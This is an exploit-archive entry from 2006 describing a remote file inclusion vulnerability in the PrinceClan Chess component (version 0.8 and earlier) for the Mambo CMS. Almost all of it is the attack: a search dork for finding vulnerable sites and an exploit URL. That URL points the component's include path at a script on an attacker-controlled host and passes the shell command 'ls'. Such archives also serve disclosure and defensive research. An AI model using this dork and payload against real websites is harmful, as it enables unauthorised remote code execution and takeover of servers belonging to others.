PrinceClan Chess Mambo Com <= 0.8 Remote Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PrinceClan Chess Mambo Com <= 0.8 Remote Inclusion Vulnerability
# Published : 2006-07-24
# Author : OLiBekaS
# Previous Title : X7 Chat <= 2.0.4 (old_prefix) Remote Blind SQL Injection Exploit
# Next Title : PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability

# pc_chess Component

- dork : index.php?option=com_pcchess

- exploit :

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls 

# www.Syue.com [2006-07-24]